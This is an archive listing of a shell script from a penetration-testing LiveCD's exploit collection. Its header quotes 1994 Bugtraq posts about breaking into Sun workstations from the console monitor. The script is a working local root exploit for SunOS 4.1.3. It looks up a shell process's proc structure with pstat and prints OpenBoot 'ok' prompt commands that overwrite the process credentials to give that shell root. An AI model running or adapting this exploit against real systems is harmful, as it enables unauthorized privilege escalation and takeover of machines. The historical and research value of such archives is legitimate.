home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / console.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  2.8 KB  |  91 lines
  1. #!/bin/sh - 
  2. #
  3. #**************************************************************************
  4. #   HACK: Use monitor on console to poke holes in memory & obtain root
  5. # System: Unix, Sun 4.1.3
  6. # Source: Bugtraq
  7. #**************************************************************************
  8. #
  9. # From: an100188@anon.penet.fi
  10. # Subject: Breaking in from the monitor at the console
  11. # Date: Fri, 27 May 1994 15:34:36 UTC
  12. # To: bugtraq@crimelab.com
  14. # Breaking into a machine, typically a workstation, by using the monitor
  15. # at the console to poke values into memory has always been possible.  I
  16. # didn't realize how simple and unobtrusive it was before I saw this
  17. # script.  This one is for Suns, but the principle applies to any
  18. # machine with a console monitor.  On Sun4s there is some sort of
  19. # "secure mode" that I presume lets you disable the monitor.  It is
  20. # possible to change the L1-A sequence to another pair of keys, but if
  21. # you own /dev/console you can change it back.  This obscurity may or
  22. # may not be useful.
  24. # This particular attack needs a way to run the script on the machine,
  25. # typically in a shell.  I presume there are other spots where you could
  26. # tickle a machine that don't even require that.  Physically secure
  27. # consoles prevent this attack.
  29. # Sigh.
  30. #
  31. # ----------------------------------------------------------------------------
  32. #
  33. # Subject: Re: Breaking in from the monitor at the console
  34. # Date: Sat, 28 May 1994 10:15:52 UTC
  35. # To: bugtraq@crimelab.com
  37. # Oops, someone pointed out that the script was deleted by the anonymous
  38. # mail signature-remover.  Sorry about that.  Here's the script:
  42. # Program: fc-4.1.3
  43. # Author: Anonymous
  44. # Usage: fc-4.1.3 PID
  45. #       PID is the PID of the shell you wish to give root to.
  46. #
  47. # Description:
  48. #       Tell people how to give themselves root (on SunOS 4.1.3 machines)
  49. #
  50.  
  51. # Give the program a known path
  52. PATH="/bin:/usr/etc:/usr/ucb"
  53. export PATH
  54.  
  55. if [ $1x = x ]; then 
  56. cat - << EOF
  57. Usage: $0 PID
  58.         Where PID is the PID of the shell you want to give root to.
  59.  
  60. Note - for csh the PID is stored in \$\$.
  61. EOF
  62.         exit 1
  63. fi
  64.  
  65. # This is the start of the proc structure for a given PID.
  66. procp=`pstat -u $1 | grep procp | cut -f2`
  67.  
  68. # This is really the only important information here.
  69. # This number is the offset of the pointer to the cred structure 
  70. # in the proc structure.
  71. ucred="4c"
  72.  
  73. cat - << EOF
  74. On the console press '<L1>a', you should see then see the following message:
  75.         Type  'go' to resume
  76.         ok 
  77.  
  78. type the following at the 'ok' prompt:
  79.         b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
  80.         go
  81.  
  82. Notes: 
  83.         * On some sun keyboards the '<L1>' key is labeled 'Stop'.
  84.         * There is Emacs style line editing available at the 'ok' prompt.
  85. EOF
  86.  
  87. exit 0
  88.  
  89.  
  90.  
  91. #                 www.hack.co.za           [2000]#